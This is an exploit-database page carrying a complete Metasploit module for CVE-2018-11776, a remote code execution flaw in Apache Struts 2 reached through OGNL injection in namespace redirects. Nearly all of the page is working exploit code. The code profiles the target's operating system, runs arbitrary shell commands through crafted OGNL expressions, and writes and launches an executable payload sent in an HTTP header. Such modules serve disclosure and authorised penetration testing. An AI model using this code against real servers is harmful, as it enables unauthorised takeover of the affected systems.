Apache Struts 2 Namespace Redirect OGNL Injection

2018.09.08
Credit: wvu
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE # Eschewing CmdStager for now, since the use of '\' and ';' are killing me #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection', 'Description' => %q{ This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk. }, #TODO: Is that second paragraph above still accurate? 'Author' => [ 'Man Yue Mo', # Discovery 'hook-s3c', # PoC 'asoto-r7', # Metasploit module 'wvu' # Metasploit module ], 'References' => [ ['CVE', '2018-11776'], ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'], ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'], ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'], ], 'Privileged' => false, 'Targets' => [ [ 'Automatic detection', { 'Platform' => %w{ unix windows linux }, 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], }, ], [ 'Windows', { 'Platform' => %w{ windows }, 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], }, ], [ 'Linux', { 'Platform' => %w{ unix linux }, 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} }, ], ], 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]), OptString.new('ENABLE_STATIC', [ true, 'Enable "allowStaticMethodAccess" before executing OGNL', true ]), ] ) register_advanced_options( [ OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]), OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"] ), OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', "#{rand_text_alpha(8)}"] ), ] ) end def check # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable ognl = "#_memberAccess['allowStaticMethodAccess']" resp = send_struts_request(ognl) # If vulnerable, the server should return an HTTP 302 (Redirect) # and the 'Location' header should contain either 'true' or 'false' if resp && resp.headers['Location'] output = resp.headers['Location'] vprint_status("Redirected to: #{output}") if (output.include? '/true/') print_status("Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'") datastore['ENABLE_STATIC'] = false CheckCode::Vulnerable elsif (output.include? '/false/') print_status("Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'") datastore['ENABLE_STATIC'] = true CheckCode::Vulnerable else CheckCode::Safe end elsif resp && resp.code==400 # METHOD 2: Generate two random numbers, ask the target to add them together. # If it does, it's vulnerable. a = rand(10000) b = rand(10000) c = a+b ognl = "#{a}+#{b}" resp = send_struts_request(ognl) if resp.headers['Location'].include? c.to_s vprint_status("Redirected to: #{resp.headers['Location']}") print_status("Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'") datastore['ENABLE_STATIC'] = false CheckCode::Vulnerable else CheckCode::Safe end end end def exploit case payload.arch.first when ARCH_CMD resp = execute_command(payload.encoded) else resp = send_payload() end end def encode_ognl(ognl) # Check and fail if the command contains the follow bad characters: # ';' seems to terminates the OGNL statement # '/' causes the target to return an HTTP/400 error # '\' causes the target to return an HTTP/400 error (sometimes?) # '\r' ends the GET request prematurely # '\n' ends the GET request prematurely # TODO: Make sure the following line is uncommented bad_chars = %w[; \\ \r \n] # and maybe '/' bad_chars.each do |c| if ognl.include? c print_error("Bad OGNL request: #{ognl}") fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'") end end # The following list of characters *must* be encoded or ORNL will asplode encodable_chars = { "%": "%25", # Always do this one first. :-) " ": "%20", "\"":"%22", "#": "%23", "'": "%27", "<": "%3c", ">": "%3e", "?": "%3f", "^": "%5e", "`": "%60", "{": "%7b", "|": "%7c", "}": "%7d", #"\/":"%2f", # Don't do this. Just leave it front-slashes in as normal. #";": "%3b", # Doesn't work. Anyone have a cool idea for a workaround? #"\\":"%5c", # Doesn't work. Anyone have a cool idea for a workaround? #"\\":"%5c%5c", # Doesn't work. Anyone have a cool idea for a workaround? } encodable_chars.each do |k,v| #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp) ognl.gsub!("#{k}","#{v}") end return ognl end def send_struts_request(ognl, payload: nil) =begin #badchar-checking code pre = ognl =end ognl = "${#{ognl}}" vprint_status("Submitted OGNL: #{ognl}") ognl = encode_ognl(ognl) headers = {'Keep-Alive': 'timeout=5, max=1000'} if payload vprint_status("Embedding payload of #{payload.length} bytes") headers[datastore['HEADER']] = payload end # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs uri = "/#{ognl}/#{datastore['ACTION']}" resp = send_request_cgi( #'encode' => true, # this fails to encode '\', which is a problem for me 'uri' => uri, 'method' => datastore['HTTPMethod'], 'headers' => headers ) if resp && resp.code == 404 fail_with(Failure::UnexpectedReply, "Server returned HTTP 404, please double check TARGETURI and ACTION options") end =begin #badchar-checking code print_status("Response code: #{resp.code}") #print_status("Response recv: BODY '#{resp.body}'") if resp.body if resp.headers['Location'] print_status("Response recv: LOC: #{resp.headers['Location'].split('/')[1]}") if resp.headers['Location'].split('/')[1] == pre[1..-2] print_good("GOT 'EM!") else print_error(" #{pre[1..-2]}") end end =end resp end def profile_target # Use OGNL to extract properties from the Java environment properties = { 'os.name': nil, # e.g. 'Linux' 'os.arch': nil, # e.g. 'amd64' 'os.version': nil, # e.g. '4.4.0-112-generic' 'user.name': nil, # e.g. 'root' #'user.home': nil, # e.g. '/root' (didn't work in testing) 'user.language': nil, # e.g. 'en' #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing) } ognl = "" ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] ognl << %Q|('#{rand_text_alpha(2)}')| properties.each do |k,v| ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'| end ognl = ognl[0...-4] r = send_struts_request(ognl) if r.code == 400 fail_with(Failure::UnexpectedReply, "Server returned HTTP 400, consider toggling the ENABLE_STATIC option") elsif r.headers['Location'] # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action' # Extract the OGNL output from the Location path, and strip the two random chars s = r.headers['Location'].split('/')[1][2..-1] if s.nil? # Since the target didn't respond with an HTTP/400, we know the OGNL code executed. # But we didn't get any output, so we can't profile the target. Abort. return nil end # Confirm that all fields were returned, and non include extra (:) delimiters # If the OGNL fails, we might get a partial result back, in which case, we'll abort. if s.count(':') > properties.length print_error("Failed to profile target. Response from server: #{r.to_s}") fail_with(Failure::UnexpectedReply, "Target responded with unexpected profiling data") end # Separate the colon-delimited properties and store in the 'properties' hash s = s.split(':') i = 0 properties.each do |k,v| properties[k] = s[i] i += 1 end print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" + " #{properties[:'os.arch']}, running as #{properties[:'user.name']}") return properties else print_error("Failed to profile target. Response from server: #{r.to_s}") fail_with(Failure::UnexpectedReply, "Server did not respond properly to profiling attempt.") end end def execute_command(cmd_input, opts={}) # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that. if cmd_input.include? ';' print_warning("WARNING: Command contains bad characters: semicolons (;).") end begin properties = profile_target os = properties[:'os.name'].downcase rescue vprint_warning("Target profiling was unable to determine operating system") os = '' os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' end if (os.include? 'linux') || (os.include? 'nix') cmd = "{'sh','-c','#{cmd_input}'}" elsif os.include? 'win' cmd = "{'cmd.exe','/c','#{cmd_input}'}" else vprint_error("Failed to detect target OS. Attempting to execute command directly") cmd = cmd_input end # The following OGNL will run arbitrary commands on Windows and Linux # targets, as well as returning STDOUT and STDERR. In my testing, # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds. vprint_status("Executing: #{cmd}") ognl = "" ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).| ognl << %q|(#p.redirectErrorStream(true)).| ognl << %q|(#process=#p.start()).| ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).| ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).| ognl << %q|(#r.flush())| r = send_struts_request(ognl) if r && r.code == 200 print_good("Command executed:\n#{r.body}") elsif r if r.body.length == 0 print_status("Payload sent, but no output provided from server.") elsif r.body.length > 0 print_error("Failed to run command. Response from server: #{r.to_s}") end end end def send_payload # Probe for the target OS and architecture begin properties = profile_target os = properties[:'os.name'].downcase rescue vprint_warning("Target profiling was unable to determine operating system") os = '' os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' end data_header = datastore['HEADER'] if data_header.empty? fail_with(Failure::BadConfig, "HEADER parameter cannot be blank when sending a payload") end random_filename = datastore['TEMPFILE'] # d = data stream from HTTP header # f = path to temp file # s = stream/handle to temp file ognl = "" ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).| ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).| ognl << %q|(#f.setExecutable(true)).| ognl << %q|(#f.deleteOnExit()).| ognl << %q|(#s=new java.io.FileOutputStream(#f)).| ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).| ognl << %q|(#s.write(#d)).| ognl << %q|(#s.close()).| ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| ognl << %q|(#p.start()).| ognl << %q|(#f.delete()).| success_string = rand_text_alpha(4) ognl << %Q|('#{success_string}')| exe = [generate_payload_exe].pack("m").delete("\n") r = send_struts_request(ognl, payload: exe) if r && r.headers && r.headers['Location'].split('/')[1] == success_string print_good("Payload successfully dropped and executed.") elsif r && r.headers['Location'] vprint_error("RESPONSE: " + r.headers['Location']) fail_with(Failure::PayloadFailed, "Target did not successfully execute the request") elsif r && r.code == 400 fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload") end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top